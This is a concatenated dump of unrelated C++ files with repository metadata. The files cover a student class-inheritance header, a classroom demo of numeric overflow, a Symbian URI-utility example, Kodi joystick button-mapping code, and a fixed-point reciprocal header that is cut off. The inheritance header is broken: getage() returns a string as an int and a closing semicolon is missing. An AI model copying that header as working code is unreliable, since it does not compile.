| 2023-05-14T06:50:30.740309
| 2021-06-13T15:21:39
| 2021-06-13T15:21:39
| 337,528,656
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,448
|
h
|
two.h
|
#include <cstring>
#include <iostream>
class one{
protected:
std::string name;
int age;
public:
one();
one(std::string, int);
one(const one&);
std::string getname() const{return name;}
void setname(std::string name){this->name = name;}
int getage() const{return name;}
void setage(int age){this->age = age;}
};
class two: public one{
protected:
std::string profession;
int yearsofexp;
public:
two();
two(std::string, int, std::string, int);
two(const two&);
std::string getprofession() const{return profession;}
int getyearsofexp() const{return yearsofexp;}
void setprofession(std::string profession){this->profession = profession;}
void setyearsofexp(int yearsofexp){this->yearsofexp = yearsofexp;}
};
class three: public one{
protected:
double height;
public:
three();
three(std::string, int, double);
three(const three&);
double getheight() const{return height;}
void setheight(double height){this->height = height;}
};
class four: public two, public three{
private:
float weight;
public:
four();
four(std::string, int, std::string, int, double, float);
four(const four&);
float getweight() const{return weight;}
void setweight(float weight){this->weight = weight;}
}
|
df069a0c9ac1c2de8a48be2945fffc67913f729b
|
154fda133653215a16fc6a9a164e2b58302a3bc9
|
/Notas de Clase/clase04/overflow.cpp
|
edbefbf591acddface31bfee7606508a6fb0348e
|
[] |
no_license
|
cgaravitoc/Herramientas-Computacionales
|
77061bbbec104177d337f0d0a910cd91775e7a5b
|
05e4b88db643699217e548a7c2b5447e8212550e
|
refs/heads/master
| 2021-03-27T19:12:30.736350
| 2017-10-20T16:57:14
| 2017-10-20T16:57:14
| 99,986,033
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 853
|
cpp
|
overflow.cpp
|
#include<iostream>
int main(){
std::cout<< "*********int***********" << "\n";
int intunder =1000;
int intover =1000;
int N=10000;
for(int i=1;i<=N;i++){
intunder=intunder+1;
intover=intover-1;
std::cout << i << "\t" << intunder << "\t" << intover << "\n" ;
}
std::cout<< "*********double***********"<< "\n";
double doubleunder =1;
double doubleover =1;
for(int i=1;i<=N;i++){
doubleunder=doubleunder/2;
doubleover=doubleover*2;
std::cout << i << "\t" << doubleunder << "\t" << doubleover << "\n" ;
}
std::cout<< "*********logdouble***********" << "\n" ;
long double ldoubleunder =1;
long double ldoubleover =1;
for(int i=1;i<=N;i++){
ldoubleunder=ldoubleunder/2;
ldoubleover=ldoubleover*2;
std::cout << i << "\t" << ldoubleunder << "\t" << ldoubleover << "\n" ;
}
return 0;
}
|
4ea85d604b6d20b00b63f03f1373153fe680ff1c
|
fcf03ead74f6dc103ec3b07ffe3bce81c820660d
|
/AppProts/InetProtUtil/ExampleInetProtUtil.cpp
|
11a15753dfe54496fe34bd030739230bf7ac8862
|
[] |
no_license
|
huellif/symbian-example
|
72097c9aec6d45d555a79a30d576dddc04a65a16
|
56f6c5e67a3d37961408fc51188d46d49bddcfdc
|
refs/heads/master
| 2016-09-06T12:49:32.021854
| 2010-10-14T06:31:20
| 2010-10-14T06:31:20
| 38,062,421
| 2
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 14,806
|
cpp
|
ExampleInetProtUtil.cpp
|
// ExampleInetProtUtil.CPP
//
// Copyright (c) Symbian Software Ltd 2005. All rights reserved.
//
/**
ExampleInetProtUtil is a sample code for understanding the applicability of InetProtUtil.
It is intended as an example and introduction to the INETPROTUTIL API's.
Users should have a brief understanding of URIs and the different concepts
associated with it, like, URLs and URI components.
*/
// System includes
#include <e32base.h>
#include <e32cons.h>
// Local include
#include "ExampleInetProtUtil.h"
_LIT ( KTest, "InetProtUtil Example" );
_LIT ( KInetProtUtilExamplePanic, "EXAMPLES");
_LIT ( KDisplayAll, "\n%d %S %d %S " );
_LIT ( KLeaveALine, "\n" );
CExampleInetProtUtil::CExampleInetProtUtil()
{
}
CExampleInetProtUtil::~CExampleInetProtUtil()
{
delete iConsole;
}
void CExampleInetProtUtil::NewL()
{
CExampleInetProtUtil *self = new (ELeave) CExampleInetProtUtil;
CleanupStack::PushL(self);
self->ConstructL();
CleanupStack::PopAndDestroy(self);
}
void CExampleInetProtUtil::ConstructL()
{
iConsole = Console::NewL(KTest,TSize(KConsFullScreen,KConsFullScreen));
iConsole->Printf ( KTest );
_LIT(KTextStart, "\nPress any key to step through the example");
iConsole->Printf ( KTextStart );
iConsole->Getch ();
//Create an URI
CreateUriL();
//Modify URI components
ModifyUriComponentsL();
//Resolve
ResolveUriL();
//Parse the URI
ParseUriL();
//Validate URI components
ValidateUriComponentsL();
//Extract URI components
ExtractUriComponentsL();
//Retrieve Filename from a given Uri
RetrieveFileNameL();
//Add and Trim delimiters
ModifyDelimiterL();
//Text Utilities
WhiteSpaceRemover();
//Escape encode and decode
EscapeEncodeDecodeL();
}
//Create an URI
void CExampleInetProtUtil::CreateUriL()
{
//Set the physical path of the file
_LIT(KText1, "\n\n\nThe Physical location of the file is....");
iConsole->Printf ( KText1 );
_LIT(KFullUriName, "K:\\ws\\direct\\direct.mmp");
//display it
TBuf<40> desFullUriName(KFullUriName);
iConsole->Printf ( KLeaveALine );
iConsole->Printf ( KFullUriName );
//create the Uri for the path
CUri8* uri8 = CUri8::CreateFileUriL(desFullUriName);
const TDesC8& desUriDisplay = uri8->Uri().UriDes();
TBuf16<100> desCreateUri;
desCreateUri.Copy (desUriDisplay);
//display it
_LIT(KText2, "And its Uri is....");
iConsole->Printf ( KLeaveALine );
iConsole->Printf ( KText2 );
iConsole->Printf ( KLeaveALine );
iConsole->Printf ( desCreateUri );
delete uri8;
iConsole->Getch ();
}
//Modify URI components
void CExampleInetProtUtil::ModifyUriComponentsL()
{
TUriParser8 parser1;
CUri8* aUri = CUri8::NewL(parser1);
_LIT(KText3, "\n\n\nAdding Uri components one by one....");
iConsole->Printf ( KText3 );
// Adding components to the Uri
//Setting and displaying SCHEME
_LIT8(KScheme, "http");
_LIT(KScheme1, "\nSCHEME : http");
iConsole->Printf ( KScheme1 );
aUri->SetComponentL(KScheme, EUriScheme);
//Setting and displaying HOST
_LIT8(KHost, "www.symbian.com");
_LIT(KHost1, "\nHOST : www.symbian.com");
iConsole->Printf ( KHost1 );
aUri->SetComponentL(KHost, EUriHost);
//Setting and displaying PORT
_LIT8(KPort, "80");
_LIT(KPort1, "\nPORT : 80");
iConsole->Printf ( KPort1 );
aUri->SetComponentL(KPort, EUriPort);
//Setting and displaying PATH
_LIT8(KPath, "/developer/techlib/turic8class.html");
_LIT(KPath1, "\nPATH : /developer/techlib/turic8class.html");
iConsole->Printf ( KPath1 );
aUri->SetComponentL(KPath, EUriPath);
//Display the constucted Uri
_LIT(KText4, "\nThe fully constructed Uri....");
iConsole->Printf ( KText4 );
const TDesC8& desUriDisplay = aUri->Uri().UriDes();
TBuf16<100> desFullUri;
desFullUri.Copy (desUriDisplay);
iConsole->Printf( KLeaveALine );
iConsole->Printf ( desFullUri );
// Removal of component from the Uri
iConsole->Getch ();
_LIT(KText5, "\n\nUri with the Port number removed....\n");
iConsole->Printf ( KText5 );
aUri->RemoveComponentL(EUriPort);
//Display the modified Uri
const TDesC8& desRemovedComponentDisplay =aUri->Uri().UriDes();
TBuf16<100> desRemovedComponent;
desRemovedComponent.Copy (desRemovedComponentDisplay);
iConsole->Printf ( desRemovedComponent );
delete aUri;
iConsole->Getch ();
}
//Parse the URI
void CExampleInetProtUtil::ParseUriL()
{
//Create a Uri
_LIT(KText6, "\n\n\nParsing the Uri for....\n");
iConsole->Printf ( KText6 );
_LIT(KFullUriName,"K:\\ws\\direct\\direct.mmp");
TBuf<40> desFullUriName(KFullUriName);
iConsole->Printf ( desFullUriName );
//Convert from Unicode format to UTF-8 format
HBufC8* convert8 = EscapeUtils::ConvertFromUnicodeToUtf8L(desFullUriName);
TUriParser8 parser;
//Parse the Uri
TInt errResult = parser.Parse(*convert8);
if (errResult==KErrNone)
{
_LIT(KTextParsing, "\nThis Uri has been parsed successfully");
iConsole->Printf ( KTextParsing );
}
delete convert8;
iConsole->Getch();
}
//Validate URI components
void CExampleInetProtUtil::ValidateUriComponentsL()
{
TUriParser8 parser1;
CUri8* aUri = CUri8::NewL(parser1);
_LIT(KTextf, "\n\n\nValidating the Uri....\n");
iConsole->Printf ( KTextf );
// Adding components to the Uri
//Adding Scheme
_LIT8(KScheme, "http");
aUri->SetComponentL(KScheme,EUriScheme);
//Adding Host
_LIT8(KHost, "waterlang.org");
aUri->SetComponentL(KHost,EUriHost);
//Adding Port
_LIT8(KPort, "90");
aUri->SetComponentL(KPort,EUriPort);
//Adding Path
_LIT8(KPath, "/turic8class.html");
aUri->SetComponentL(KPath,EUriPath);
//Adding Query
_LIT8(KQuery, "bar=2&x=3");
aUri->SetComponentL(KQuery,EUriQuery);
//Adding Fragment
_LIT8(KFragment, "fragment");
aUri->SetComponentL(KFragment,EUriFragment);
//Display the constructed Uri
const TDesC8& desUriDisplays =aUri->Uri().UriDes();
TBuf16<100> desValidate;
desValidate.Copy (desUriDisplays);
iConsole->Printf ( desValidate );
// Validate() is not supported for HTTP, but only SIP and SIPS.
//The Parse() function itself validates the components and returns the
//appropriate result.
TInt res = parser1.Parse(desUriDisplays);
if (res==KErrNone)
{
_LIT(KText8, "\nThis Uri is VALID");
iConsole->Printf ( KText8 );
}
delete aUri;
iConsole->Getch();
}
//Extract URI components
void CExampleInetProtUtil::ExtractUriComponentsL()
{
_LIT(KTextExtract, "\n\n\nExtracting from....\n");
iConsole->Printf ( KTextExtract );
//Create a Uri
_LIT(KUriName, "K:\\ws\\direct\\direct.mmp");
TBuf<40> desUriName(KUriName);
CUri8* uriName = CUri8::CreateFileUriL(desUriName);
//Display the Uri
const TDesC8& uriDisplay = uriName->Uri().UriDes();
TBuf16<100> desExtract;
desExtract.Copy (uriDisplay);
iConsole->Printf ( desExtract );
//Parse the Uri
TUriParser8* uriComponent = new(ELeave) TUriParser8();
uriComponent->Parse(uriDisplay);
//Extract the Scheme component from this Uri
const TDesC8& host = uriComponent->Extract(EUriScheme);
TBuf16<100> desEx;
desEx.Copy (host);
//Display the Component extracted
_LIT(KTextEx, "\nThe extracted Scheme component is....\n");
iConsole->Printf ( KTextEx );
iConsole->Printf ( desEx );
//delete fileName;
delete uriComponent;
delete uriName;
iConsole->Getch();
}
//Extract URI components
void CExampleInetProtUtil::RetrieveFileNameL()
{
_LIT(KTextRet, "\n\n\nRetrieving filename from....\n");
iConsole->Printf ( KTextRet );
//Create a Uri
_LIT(KUriRetName, "K:\\ws\\direct\\direct.mmp");
TBuf<40> desUriRetName(KUriRetName);
CUri8* uriRetName = CUri8::CreateFileUriL(desUriRetName);
//Display the Uri
const TDesC8& uriDisp = uriRetName->Uri().UriDes();
TBuf16<100> desRetrieve;
desRetrieve.Copy (uriDisp);
iConsole->Printf ( desRetrieve );
//Parse the Uri
TUriParser8* uriComp = new(ELeave) TUriParser8();
uriComp->Parse(uriDisp);
//Get or Extract the Filename from the Uri
_LIT(KTextGetFilename, "\nGetting the filename....\n");
iConsole->Printf ( KTextGetFilename );
HBufC* fileName = uriComp->GetFileNameL();
TPtr uriFileNameDisplay = fileName->Des();
TBuf16<100> desFileName;
desFileName.Copy (uriFileNameDisplay);
iConsole->Printf ( desFileName );
delete fileName;
delete uriComp;
delete uriRetName;
iConsole->Getch();
}
//Modify the Uri w.r.t Delimiters
void CExampleInetProtUtil::ModifyDelimiterL()
{
// First set the delimiter before performing any operation
_LIT(KTextDelimit1, "\n\n\nThe Delimiter is...\n");
iConsole->Printf ( KTextDelimit1 );
CExampleDelimiterModifier* delimiterModifyingObj = new(ELeave) CExampleDelimiterModifier;
delimiterModifyingObj->SetDelimiter(TChar(';'));
//Display the delimiter
_LIT(KTextDelimit2, ";\n");
iConsole->Printf ( KTextDelimit2 );
_LIT(KTextDelimit, "to be checked in...\n");
iConsole->Printf ( KTextDelimit );
_LIT(KFullUriName,"K:\\ws\\direct\\direct.mmp;");
TBuf<40> desFullUriName(KFullUriName);
iConsole->Printf ( desFullUriName );
//Then parse the Uri
HBufC8* convert8 = EscapeUtils::ConvertFromUnicodeToUtf8L(desFullUriName);
delimiterModifyingObj->Parse(*convert8);
//Check if the delimiter is present in the front
TBool checkFrontDelimiter = delimiterModifyingObj->CheckFrontDelimiter();
//Check if the delimiter is present at the back
TBool checkBackDelimiter = delimiterModifyingObj->CheckBackDelimiter();
//Display the result
if (!checkFrontDelimiter)
{
_LIT(KTextDelimit3, "\nNo delimiter in the front");
iConsole->Printf ( KTextDelimit3 );
}
else
{
_LIT(KTextDelimit4, "\nDelimiter is present in the front");
iConsole->Printf ( KTextDelimit4 );
}
if (!checkBackDelimiter)
{
_LIT(KTextDelimit5, "\nNo delimiter at the back");
iConsole->Printf ( KTextDelimit5 );
}
else
{
_LIT(KTextDelimit6, "\nDelimiter is present at the back");
iConsole->Printf ( KTextDelimit6 );
}
delete convert8;
delete delimiterModifyingObj;
iConsole->Getch();
}
//Check for white spaces in the Uri
void CExampleInetProtUtil::WhiteSpaceRemover()
{
//Take an eg file and insert white spaces in the front and rear
_LIT(KTextWhiteSpace, "\n\n\nThe Uri containing white spaces....\n");
iConsole->Printf ( KTextWhiteSpace );
_LIT(KFullUriPath," K:\\ws\\direct\\direct.mmp ");
TBuf<40> desFullUriPath(KFullUriPath);
iConsole->Printf ( desFullUriPath );
//Gets the Whitespaces on the right and left of the Uri
TPtrC desFullUriName(KFullUriPath);
//Check for white spaces in the front or on the left of the Uri
TInt consumedWhiteSpacesLeft = InetProtTextUtils::RemoveWhiteSpace(desFullUriName,InetProtTextUtils::ERemoveLeft);
//Check for white spaces at the back or on the right of the Uri
TInt consumedWhiteSpacesRight = InetProtTextUtils::RemoveWhiteSpace(desFullUriName,InetProtTextUtils::ERemoveRight);
_LIT(KTextAnd, " and ");
_LIT(KTextInfo, " white spaces have been removed from the Uri");
//Display the number of white spaces removed from Uri
iConsole->Printf ( KDisplayAll,consumedWhiteSpacesLeft,&KTextAnd,consumedWhiteSpacesRight, &KTextInfo);
iConsole->Getch();
}
//Encode and Decode the Uri
void CExampleInetProtUtil::EscapeEncodeDecodeL()
{
//Take an eg file to encode it and then decode it....
_LIT(KFullUriName,"K:\\ws\\direct\\direct.mmp");
TBuf<40> desFullUriName(KFullUriName);
//UTF-8 defines a mapping from sequences of octets to sequences of chars
HBufC8* convert = EscapeUtils::ConvertFromUnicodeToUtf8L(desFullUriName);
//Encode the eg Uri and display it
_LIT(KTextEncode, "\n\n\nThe Encoded Uri is....\n");
iConsole->Printf ( KTextEncode );
HBufC16* encode = EscapeUtils::EscapeEncodeL(desFullUriName,EscapeUtils::EEscapeNormal);
TPtr uriEncoded = encode->Des();
TBuf16<100> desEncodedUri;
desEncodedUri.Copy (uriEncoded);
iConsole->Printf ( _L("%S"), &desEncodedUri );
//Decode the eg Uri and display it
_LIT(KTextDecode, "\nThe Decoded Uri is....\n");
iConsole->Printf ( KTextDecode );
HBufC16* decode = EscapeUtils::EscapeDecodeL(desFullUriName);
TPtr uriDecoded = decode->Des();
TBuf16<100> desDecodedUri;
desDecodedUri.Copy (uriDecoded);
iConsole->Printf ( _L("%S"), &desDecodedUri );
delete decode;
delete encode;
delete convert;
iConsole->Getch();
iConsole->Printf ( KLeaveALine );
}
//Resolve the Uri w.r.t a Base and a refernce Uri
void CExampleInetProtUtil::ResolveUriL()
{
_LIT(KTextResolve1, "\n\n\nThe Base and reference Uris are\n");
iConsole->Printf ( KTextResolve1 );
TUriParser8 parserResolve1;
CUri8* aUriBase = CUri8::NewL(parserResolve1);
//Adding Scheme
_LIT8(KScheme, "http");
aUriBase->SetComponentL(KScheme,EUriScheme);
//Adding Host
_LIT8(KHost, "symbian.com");
aUriBase->SetComponentL(KHost,EUriHost);
//Adding Port
_LIT8(KPort, "90");
aUriBase->SetComponentL(KPort,EUriPort);
//Adding Path
_LIT8(KPath, "/resolve.aspx");
aUriBase->SetComponentL(KPath,EUriPath);
const TDesC8& desBaseUri =aUriBase->Uri().UriDes();
TBuf16<100> desBase;
desBase.Copy (desBaseUri);
iConsole->Printf ( desBase );
iConsole->Printf( KLeaveALine );
CUri8* aUriRef = CUri8::NewL(parserResolve1);
//Adding Path
_LIT8(KPath1, "/uris/base/reference/resolve.aspx");
aUriRef->SetComponentL(KPath1,EUriPath);
//Adding Query
_LIT8(KQuery1, "bar=2&x=3");
aUriRef->SetComponentL(KQuery1,EUriQuery);
const TDesC8& desRefUri =aUriRef->Uri().UriDes();
TBuf16<100> desRef;
desRef.Copy (desRefUri);
iConsole->Printf ( desRef );
_LIT(KTextResolve, "\nThe Resolved Uri is....\n");
iConsole->Printf ( KTextResolve );
//Resolve the 2 Uri's to get a resultant uri
CUri8* Uri8 = CUri8::ResolveL(aUriBase->Uri(),aUriRef->Uri());
// Display the resultant Uri
const TDesC8& desDisplayReslovedUri = Uri8->Uri().UriDes();
TBuf16<100> desResolve;
desResolve.Copy (desDisplayReslovedUri);
iConsole->Printf ( desResolve );
delete Uri8;
delete aUriRef;
delete aUriBase;
iConsole->Getch ();
}
////////////////////////////////////////////
// Main //
////////////////////////////////////////////
GLDEF_C TInt E32Main()
{
__UHEAP_MARK;
CTrapCleanup* tc = CTrapCleanup::New();
TRAPD(err, CExampleInetProtUtil::NewL());
if (err != KErrNone)
User::Panic(KInetProtUtilExamplePanic,err);
delete tc;
__UHEAP_MARKEND;
return KErrNone;
}
|
ce33a681dfdd491f8a13f21c927d212458919eea
|
e26c75947a218bca70989cbe0a0b2f3d4e782e8b
|
/src/storage/ButtonMap.cpp
|
de24144ad3f40f204a0c1e4892e726063ee9e6c4
|
[] |
no_license
|
acmiyaguchi/peripheral.joystick
|
c5014b773be44c02399b300c267cf37f69d8c8c1
|
d9c85400f9da8f41c7f15065a8c5800ea77eddf8
|
refs/heads/master
| 2021-01-14T08:54:53.445751
| 2015-07-06T19:39:44
| 2015-07-06T19:41:49
| 37,966,226
| 0
| 0
| null | 2015-06-24T06:18:18
| 2015-06-24T06:18:18
| null |
UTF-8
|
C++
| false
| false
| 10,667
|
cpp
|
ButtonMap.cpp
|
/*
* Copyright (C) 2014-2015 Garrett Brown
* Copyright (C) 2014-2015 Team XBMC
*
* This Program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This Program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with XBMC; see the file COPYING. If not, see
* <http://www.gnu.org/licenses/>.
*
*/
#include "ButtonMap.h"
#include "log/Log.h"
using namespace JOYSTICK;
CButtonMap& CButtonMap::operator=(const CButtonMap& rhs)
{
if (this != &rhs)
{
Reset();
for (Buttons::const_iterator it = rhs.m_buttons.begin(); it != rhs.m_buttons.end(); ++it)
m_buttons[it->first] = it->second->Clone();
}
return *this;
}
void CButtonMap::Reset(void)
{
for (Buttons::iterator it = m_buttons.begin(); it != m_buttons.end(); ++it)
delete it->second;
m_buttons.clear();
}
void CButtonMap::GetFeatures(std::vector<ADDON::JoystickFeature*>& features) const
{
for (Buttons::const_iterator itButton = m_buttons.begin(); itButton != m_buttons.end(); ++itButton)
features.push_back(itButton->second);
}
bool CButtonMap::MapFeature(const ADDON::JoystickFeature* feature)
{
bool bModified = false;
if (feature && !feature->Name().empty())
{
const std::string& strFeatureName = feature->Name();
Buttons::iterator itFeature = m_buttons.find(strFeatureName);
const bool bExists = (itFeature != m_buttons.end());
if (bExists && itFeature->second->Equals(feature))
{
dsyslog("Button map: relationship for \"%s\" already exists", strFeatureName.c_str());
}
else
{
dsyslog("Button map: %s \"%s\"", bExists ? "updating" : "adding", strFeatureName.c_str());
// If button map is modified, iterator may be invalidated
if (UnMap(feature))
itFeature = m_buttons.find(strFeatureName);
if (itFeature == m_buttons.end())
{
m_buttons[strFeatureName] = feature->Clone();
}
else
{
delete itFeature->second;
itFeature->second = feature->Clone();
}
bModified = true;
}
}
return bModified;
}
bool CButtonMap::UnMap(const ADDON::JoystickFeature* feature)
{
switch (feature->Type())
{
case JOYSTICK_DRIVER_TYPE_BUTTON:
return UnMapButton(static_cast<const ADDON::DriverButton*>(feature));
case JOYSTICK_DRIVER_TYPE_HAT_DIRECTION:
return UnMapHat(static_cast<const ADDON::DriverHat*>(feature));
case JOYSTICK_DRIVER_TYPE_SEMIAXIS:
return UnMapSemiAxis(static_cast<const ADDON::DriverSemiAxis*>(feature));
case JOYSTICK_DRIVER_TYPE_ANALOG_STICK:
return UnMapAnalogStick(static_cast<const ADDON::DriverAnalogStick*>(feature));
case JOYSTICK_DRIVER_TYPE_ACCELEROMETER:
return UnMapAccelerometer(static_cast<const ADDON::DriverAccelerometer*>(feature));
default:
break;
}
return false;
}
bool CButtonMap::UnMapButton(const ADDON::DriverButton* button)
{
for (Buttons::iterator it = m_buttons.begin(); it != m_buttons.end(); ++it)
{
if (ButtonConflicts(button, it->second))
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
return true;
}
}
return false;
}
bool CButtonMap::UnMapHat(const ADDON::DriverHat* hat)
{
for (Buttons::iterator it = m_buttons.begin(); it != m_buttons.end(); ++it)
{
if (HatConflicts(hat, it->second))
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
return true;
}
}
return false;
}
bool CButtonMap::UnMapSemiAxis(const ADDON::DriverSemiAxis* semiAxis)
{
for (Buttons::iterator it = m_buttons.begin(); it != m_buttons.end(); ++it)
{
if (SemiAxisConflicts(semiAxis, it->second))
{
switch (it->second->Type())
{
case JOYSTICK_DRIVER_TYPE_SEMIAXIS:
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
break;
}
case JOYSTICK_DRIVER_TYPE_ANALOG_STICK:
{
ADDON::DriverAnalogStick* analogStick = static_cast<ADDON::DriverAnalogStick*>(it->second);
if (semiAxis->Index() == analogStick->XIndex())
{
analogStick->SetXIndex(-1);
if (analogStick->YIndex() < 0)
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
}
}
else if (semiAxis->Index() == analogStick->YIndex())
{
analogStick->SetYIndex(-1);
if (analogStick->XIndex() < 0)
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
}
}
break;
}
case JOYSTICK_DRIVER_TYPE_ACCELEROMETER:
{
ADDON::DriverAccelerometer* accelerometer = static_cast<ADDON::DriverAccelerometer*>(it->second);
if (semiAxis->Index() == accelerometer->XIndex())
{
accelerometer->SetXIndex(-1);
if (accelerometer->YIndex() < 0 && accelerometer->ZIndex() < 0)
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
}
}
else if (semiAxis->Index() == accelerometer->YIndex())
{
accelerometer->SetYIndex(-1);
if (accelerometer->XIndex() < 0 && accelerometer->ZIndex() < 0)
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
}
}
else if (semiAxis->Index() == accelerometer->ZIndex())
{
accelerometer->SetZIndex(-1);
if (accelerometer->XIndex() < 0 && accelerometer->YIndex() < 0)
{
dsyslog("Removing \"%s\" from button map due to conflict", it->second->Name().c_str());
delete it->second;
m_buttons.erase(it);
}
}
break;
}
default:
break;
}
return true; // Semi-axis conflicts
}
}
return false;
}
bool CButtonMap::UnMapAnalogStick(const ADDON::DriverAnalogStick* analogStick)
{
bool bModified = false;
ADDON::DriverSemiAxis semiAxis;
if (analogStick->XIndex() >= 0)
{
semiAxis.SetIndex(analogStick->XIndex());
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_POSITIVE);
bModified |= UnMapSemiAxis(&semiAxis);
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_NEGATIVE);
bModified |= UnMapSemiAxis(&semiAxis);
}
if (analogStick->YIndex() >= 0)
{
semiAxis.SetIndex(analogStick->YIndex());
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_POSITIVE);
bModified |= UnMapSemiAxis(&semiAxis);
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_NEGATIVE);
bModified |= UnMapSemiAxis(&semiAxis);
}
return bModified;
}
bool CButtonMap::UnMapAccelerometer(const ADDON::DriverAccelerometer* accelerometer)
{
bool bModified = false;
ADDON::DriverSemiAxis semiAxis;
if (accelerometer->XIndex() >= 0)
{
semiAxis.SetIndex(accelerometer->XIndex());
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_POSITIVE);
bModified |= UnMapSemiAxis(&semiAxis);
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_NEGATIVE);
bModified |= UnMapSemiAxis(&semiAxis);
}
if (accelerometer->YIndex() >= 0)
{
semiAxis.SetIndex(accelerometer->YIndex());
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_POSITIVE);
bModified |= UnMapSemiAxis(&semiAxis);
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_NEGATIVE);
bModified |= UnMapSemiAxis(&semiAxis);
}
if (accelerometer->ZIndex() >= 0)
{
semiAxis.SetIndex(accelerometer->ZIndex());
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_POSITIVE);
bModified |= UnMapSemiAxis(&semiAxis);
semiAxis.SetDirection(JOYSTICK_DRIVER_SEMIAXIS_DIRECTION_NEGATIVE);
bModified |= UnMapSemiAxis(&semiAxis);
}
return bModified;
}
bool CButtonMap::ButtonConflicts(const ADDON::DriverButton* button, const ADDON::JoystickFeature* feature)
{
if (feature->Type() == JOYSTICK_DRIVER_TYPE_BUTTON)
{
const ADDON::DriverButton* button2 = static_cast<const ADDON::DriverButton*>(feature);
return button->Index() == button2->Index();
}
return false;
}
bool CButtonMap::HatConflicts(const ADDON::DriverHat* hat, const ADDON::JoystickFeature* feature)
{
if (feature->Type() == JOYSTICK_DRIVER_TYPE_HAT_DIRECTION)
{
const ADDON::DriverHat* hat2 = static_cast<const ADDON::DriverHat*>(feature);
return hat->Index() == hat2->Index() &&
hat->Direction() == hat2->Direction();
}
return false;
}
bool CButtonMap::SemiAxisConflicts(const ADDON::DriverSemiAxis* semiAxis, const ADDON::JoystickFeature* feature)
{
if (feature->Type() == JOYSTICK_DRIVER_TYPE_SEMIAXIS)
{
const ADDON::DriverSemiAxis* semiAxis2 = static_cast<const ADDON::DriverSemiAxis*>(feature);
return semiAxis->Index() == semiAxis2->Index() &&
semiAxis->Direction() == semiAxis2->Direction();
}
else if (feature->Type() == JOYSTICK_DRIVER_TYPE_ANALOG_STICK)
{
const ADDON::DriverAnalogStick* analogStick = static_cast<const ADDON::DriverAnalogStick*>(feature);
return semiAxis->Index() == analogStick->XIndex() ||
semiAxis->Index() == analogStick->YIndex();
}
else if (feature->Type() == JOYSTICK_DRIVER_TYPE_ACCELEROMETER)
{
const ADDON::DriverAccelerometer* accelerometer = static_cast<const ADDON::DriverAccelerometer*>(feature);
return semiAxis->Index() == accelerometer->XIndex() ||
semiAxis->Index() == accelerometer->YIndex() ||
semiAxis->Index() == accelerometer->ZIndex();
}
return false;
}
|
c7a347f0ef5f768a72bab7262320d8c76a3563ad
|
cc4ebc7907c46626179e6a9f1b98c349f9fadf89
|
/include/FixPointReciprocal.h
|
332b08ec8ea689b4f6d8c4d77b22b465b1d880a7
|
[] |
no_license
|
kameier/GDecimal
|
0793dabac17fd88b296d303d280418ed8918348f
|
e43787cde86cec04be8eedfb6ba057bc4469ecce
|
refs/heads/master
| 2020-08-28T15:17:34.872677
| 2019-11-10T11:42:52
| 2019-11-10T11:42:52
| 217,737,198
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 10,397
|
h
|
FixPointReciprocal.h
|
#ifndef FixPointReciprocal_H
#define FixPointReciprocal_H
namespace FixPointOperator
{
template <typename UINT_T, int MAX_LEN> inline int DoWithDivZero(FixPointData<UINT_T, MAX_LEN>& A)
{
for(int i = 0; i < MAX_LEN; ++i) {
A[i] = ~((UINT_T)0);
}
return -1;
}
template <int MAX_LEN> inline UINT16 reciprocal_init_value(UINT16 a1, UINT16* A)
{
memset((void*)A, 0, MAX_LEN * sizeof(UINT16));
float t1 = pow(2.0, 16) / (1 + (a1 + 1) * pow(2.0, -16));
A[1] = static_cast<UINT16>(t1);
if(A[1] == 0) {
A[1] = UINT16(1) << 15;
}
return A[1];
// A1 = 0xB100;
}
template <int MAX_LEN> inline UINT32 reciprocal_init_value(UINT32 a1, UINT32* A)
{
memset((void*)(A), 0, MAX_LEN * sizeof(UINT32));
double t1 = pow(2.0, 32) / (1 + (a1 + 1) * pow(2.0, -32));
A[1] = (UINT32)(t1);
if(A[1] == 0) {
A[1] = UINT32(1) << 31;
}
return A[1];
}
template <int MAX_LEN> inline UINT64 reciprocal_init_value(UINT64 a1, UINT64* A)
{
memset((void*)(A), 0, MAX_LEN * sizeof(UINT64));
const int i = 16;
double t1 = 1.0 + ((a1 >> i) + 1) * pow(2.0, i - 64);
A[1] = (UINT64)(pow(2.0, 64) / t1);
return A[1];
}
/*
A = 1 / a
返回A = 1/a
A(n+1) = A(n) + A(n)(1 - a*A(n))
*/
template <typename UINT_T, int MAX_LEN>
int FloatPointReciprocal(const FixPointData<UINT_T, MAX_LEN>& a, FixPointData<UINT_T, MAX_LEN>& A)
{
if(a[0] == 0) {
